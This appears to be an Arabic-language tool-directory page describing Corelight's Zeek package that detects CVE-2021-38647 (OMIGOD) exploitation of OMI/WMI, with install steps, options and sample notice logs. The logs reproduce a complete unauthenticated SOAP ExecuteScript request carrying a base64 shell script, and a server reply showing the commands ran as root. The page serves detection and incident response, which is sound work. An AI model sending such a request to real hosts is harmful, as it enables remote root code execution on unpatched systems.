Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/corelight/cve-2021-38647-noimages
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتأمن السحابةكشف التسللالاستجابة للحوادث
GitHubcorelight/cve-2021-38647-noimages

CVE-2021-38647-noimages

حزمة Zeek لكشف محاولات استغلال CVE-2021-38647 (OMIGOD) من خلال مراقبة حركة مرور OMI/WMI بحثًا عن رؤوس Authorization المفقودة وحمولات SOAP الخبيثة، مع منافذ قابلة للتكوين وبيانات فرز للحوادث الأمنية.

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-38647 المعروف أيضًا باسم "OMIGOD"

حزمة Zeek تكتشف محاولات استغلال CVE-2021-38647 المعروف أيضًا باسم OMIGOD.

https://corelight.com/blog/detecting-cve-2021-38647-omigod
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647

الاستغلال

يتضمن الاستغلال ببساطة حذف ترويسة Authorization، وفيما يلي الصورة باختصار (tl;dr).
شرح الاستغلال باختصار

التثبيت

ثبّتها كحزمة Zeek في بيئة مباشرة
zkg install corelight/CVE-2021-38647 أو استخدم الرابط المباشر.
zkg install https://github.com/corelight/CVE-2021-38647/

استخدمها على ملف pcap لديك بالفعل
zeek -Cr scripts/__load__.zeek your.pcap

الخيارات والملاحظات:

  • تعمل هذه الحزمة في البيئات المجمّعة (clustered) وغير المجمّعة.

  • يمكن تغيير الخيارات القابلة للضبط في سكربت omigod.zeek لتناسب احتياجات التنفيذ لديك كما هو موضح أدناه.

  • تُضبط منافذ TCP على الافتراضية التي يقدمها OMI. أضف أي منافذ غير افتراضية إلى المجموعة التالية.
    option OMI_ports = set(1270/tcp, 5985/tcp, 5986/tcp);

  • للمساعدة في فرز الاستجابة للحوادث (IR triage) لإشعارات EXPLOIT_REQUEST وEXPLOIT_RESPONSE، سيتضمن حقل 'sub' أول 'bytes_of_data_in_notice' في الإشعار. اضبطه على رقم كبير لجمع كامل الحمولة - القيمة الافتراضية 10000 ينبغي أن تكون كافية لالتقاط جميع البيانات ذات الصلة.
    option bytes_of_data_in_notice = 10000;

  • للمساعدة في فرز الاستجابة للحوادث والصيد، سيتضمن إشعار منفصل 'EXPLOIT_ATTEMPT' أسماء وقيم ترويسات العميل في حقل 'sub' في الإشعار.
    option raise_seperate_notice_for_missing_auth_header = T;

  • استخدم القائمة البيضاء لـ User-Agent بحذر شديد لإسكات الإيجابيات الكاذبة الناتجة عن الماسح الضوئي الخاص بك أو الأنظمة المشروعة. تذكر أن المهاجم يمكنه ببساطة انتحال هذا الـ user-agent. مثال:
    option user_agent_whitelist = /^Microsoft WinRM Client$/;

مثال

هذه الإشعارات أمثلة على إعدادات الحد الأقصى من التفاصيل. ورغم أنها قد تبدو مطولة أكثر من اللازم، فإن البيانات المفيدة لفرز الاستجابة للحوادث والصيد مقدمة داخل حقل 'sub' في الإشعار.

  • يوفر إشعار EXPLOIT_ATTEMPT أسماء وقيم الترويسات للطلبات التي تجتاز مؤهلات هجوم خشنة نسبيًا. هذا إشعار متحفظ ويمكن إيقافه كما هو موضح أعلاه، ومع ذلك قد يكون من المفيد أن تكون هذه البيانات في متناول اليد (أي داخل الإشعار نفسه وليس في pcap) للاستجابة للحوادث، والصيد الاستباقي للتهديدات، وضبط القواعد. على سبيل المثال، أحد الجوانب المفيدة في هذا الإشعار هو User-Agent - الذي لا تقوم بعض أدوات إثبات المفهوم (POCs) بإخفائه بشكل صحيح في بعض الأحيان. في الحالة أدناه، يكون UA هو curl/7.52.1 والذي (اعتمادًا على حالة الاستخدام) قد يكون وسيلة غير معتادة للغاية للوصول إلى خدمات OMI بشكل مشروع. قد يتبع إشعار EXPLOIT_ATTEMPT هذا إشعار EXPLOIT_REQUEST أو EXPLOIT_RESPONSE أو لا يتبعه اعتمادًا على مؤشرات أدق.
root@kitploit:~
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    -
#path   notice
#open   2021-09-20-14-23-48
#fields ts      uid     id.orig_h       id.orig_p       id.resp_h       id.resp_p       fuid    file_mime_type  file_desc       proto   note    msg     sub     src     dst     p       n       peer_descr      actions suppress_for    remote_location.country_code    remote_location.region  remote_location.city    remote_location.latitude        remote_location.longitude
#types  time    string  addr    port    addr    port    string  string  string  enum    enum    string  string  addr    addr    port    count   string  set[enum]       interval        string  string  string  double  double
1631859865.669975       CUoF9i1epohx0Xkycj      127.0.0.1       57592   127.0.0.1       5985    -       -       -       tcp     CVE_2021_38647::EXPLOIT_ATTEMPT A request to an OMI/WMI uri is missing the Authorization header, this is possibly a CVE-2021-38647 (AKA OMIGOD) exploit attempt. Refer to https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution, see sub field for raw data       headers= '{\x0a\x09[1] = [original_name=Host, name=HOST, value=127.0.0.1:5985],\x0a\x09[2] = [original_name=User-Agent, name=USER-AGENT, value=curl/7.52.1],\x0a\x09[3] = [original_name=Accept, name=ACCEPT, value=*/*],\x0a\x09[5] = [original_name=Content-Length, name=CONTENT-LENGTH, value=2035],\x0a\x09[6] = [original_name=Expect, name=EXPECT, value=100-continue],\x0a\x09[4] = [original_name=Content-Type, name=CONTENT-TYPE, value=application/soap+xml]\x0a}'    127.0.0.1       127.0.0.1       5985    -       -       Notice::ACTION_LOG      3600.000000     -       -       -       -       -
  • يُظهر إشعار EXPLOIT_REQUEST حمولة طلب POST. يمكن تقسيمه على أكثر من إشعار واحد إذا كان POST كبيرًا (كما في الحالة أدناه )
root@kitploit:~
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    -
#path   notice
#open   2021-09-20-14-23-48
#fields ts      uid     id.orig_h       id.orig_p       id.resp_h       id.resp_p       fuid    file_mime_type  file_desc       proto   note    msg     sub     src     dst     p       n       peer_descr      actions suppress_for    remote_location.country_code    remote_location.region  remote_location.city    remote_location.latitude        remote_location.longitude
#types  time    string  addr    port    addr    port    string  string  string  enum    enum    string  string  addr    addr    port    count   string  set[enum]       interval        string  string  string  double  double
1631859866.672356       CUoF9i1epohx0Xkycj      127.0.0.1       57592   127.0.0.1       5985    -       -       -       tcp     CVE_2021_38647::EXPLOIT_REQUEST A REQUEST to an OMI/WMI uri has a missing Authorization header - this is possibly a CVE-2021-38647 (AKA OMIGOD) exploit. See sub of this notice field for the raw Request data. Refer to https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution    The first 10000 bytes of data = '<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">\x09  <s:Header>\x09\x09      <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\x09\x09          <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\x09\x09\x09      <a:ReplyTo>\x09\x09\x09\x09            <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\x09\x09\x09\x09\x09        </a:ReplyTo>\x09\x09\x09\x09\x09\x09    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\x09\x09\x09\x09\x09\x09        <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>\x09\x09\x09\x09\x09\x09\x09    <a:MessageID>uuid:00B60932-CC01-0005-0000-313370010000</a:MessageID>\x09\x09\x09\x09\x09\x09\x09        <w:OperationTimeout>PT1M30S</w:OperationTimeout>\x09\x09\x09\x09\x09\x09\x09\x09    <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>\x09\x09\x09\x09\x09\x09\x09\x09        <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>\x09\x09\x09\x09\x09\x09\x09\x09\x09    <w:OptionSet s:mustUnderstand="true"/>\x09\x09\x09\x09\x09\x09\x09\x09\x09        <w:SelectorSet>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09      <w:Selector Name="__cimnamespace">root/scx</w:Selector>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09          </w:SelectorSet>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09    </s:Header>\x09\x09\x09'    127.0.0.1       127.0.0.1       5985    -       -       Notice::ACTION_LOG
      3600.000000     -       -       -       -       -```
يُظهر الإشعار الثاني الحمولة، وهي سلسلة مشفرة بـ base64 `ZWNobyAiT01JR09EIGl0IHdvcmtzISINCmlkDQp1bmFtZQ0KZGF0ZQ0KZWNobyAiR29vZGJ5ZSINCg==` ، والتي تُفك تشفيرها إلى سكربت الصدفة هذا.

echo "OMIGOD it works!" id uname date echo "Goodbye"

root@kitploit:~

#separator \x09 #set_separator , #empty_field (empty) #unset_field - #path notice #open 2021-09-20-14-23-48 #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] interval string string string double double 1631859866.672356 CUoF9i1epohx0Xkycj 127.0.0.1 57592 127.0.0.1 5985 - - - tcp CVE_2021_38647::EXPLOIT_REQUEST A REQUEST to an OMI/WMI uri has a missing Authorization header - this is possibly a CVE-2021-38647 (AKA OMIGOD) exploit. See sub of this notice field for the raw Request data. Refer to https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution The first 10000 bytes of data = '\x09\x09\x09\x09\x09\x09\x09\x09\x09 <s:Body>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 <p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 <p:Script>ZWNobyAiT01JR09EIGl0IHdvcmtzISINCmlkDQp1bmFtZQ0KZGF0ZQ0KZWNobyAiR29vZGJ5ZSINCg==</p:Script>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 <p:Arguments/>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 <p:timeout>0</p:timeout>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 <p:b64encoded>true</p:b64encoded>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 </p:ExecuteScript_INPUT>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09 </s:Body>\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09</s:Envelope>' 127.0.0.1 127.0.0.1 5985 - - Notice::ACTION_LOG 3600.000000 - - - - -

root@kitploit:~

- يحتوي إشعار EXPLOIT_RESPONSE على البيانات التي أرسلها الخادم. في المثال أدناه، البيانات المخترَقة هي ناتج سكربت الحمولة، وهي:    
``OMIGOD it works!&#10;uid=0(root) gid=0(root) groups=0(root)&#10;Linux&#10;Fri Sep 17 06:24:26 UTC 2021&#10;Goodbye&#10;``   

#separator \x09 #set_separator , #empty_field (empty) #unset_field - #path notice #open 2021-09-20-14-23-48 #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] interval string string string double double 1631859866.680111 CUoF9i1epohx0Xkycj 127.0.0.1 57592 127.0.0.1 5985 - - - tcp CVE_2021_38647::EXPLOIT_RESPONSE A Server RESPONSE has been sent following a request to an OMI/WMI uri with a missing Authorization header - this is possibly a successful CVE-2021-38647 (AKA OMIGOD) exploit. See sub of this notice field for the raw Request data. Refer to https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution The first 10000 bytes of data = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wsmb="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:msftwinrm="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd">SOAP-ENV:Headerwsa:Tohttp://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>wsa:Actionhttp://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>wsa:MessageIDuuid:04F232DD-CC2A-0005-0000-000000210000</wsa:MessageID>wsa:RelatesTouuid:00B60932-CC01-0005-0000-313370010000</wsa:RelatesTo></SOAP-ENV:Header>SOAP-ENV:Body<p:SCX_OperatingSystem_OUTPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"><p:ReturnValue>TRUE</p:ReturnValue><p:ReturnCode>0</p:ReturnCode><p:StdOut>OMIGOD it works! uid=0(root) gid=0(root) groups=0(root) Linux Fri Sep 17 06:24:26 UTC 2021 Goodbye </p:StdOut><p:StdErr></p:StdErr></p:SCX_OperatingSystem_OUTPUT></SOAP-ENV:Body></SOAP-ENV:Envelope>' 127.0.0.1 127.0.0.1 5985 - - Notice::ACTION_LOG 3600.000000 - - - - -

root@kitploit:~
تنزيل الأداة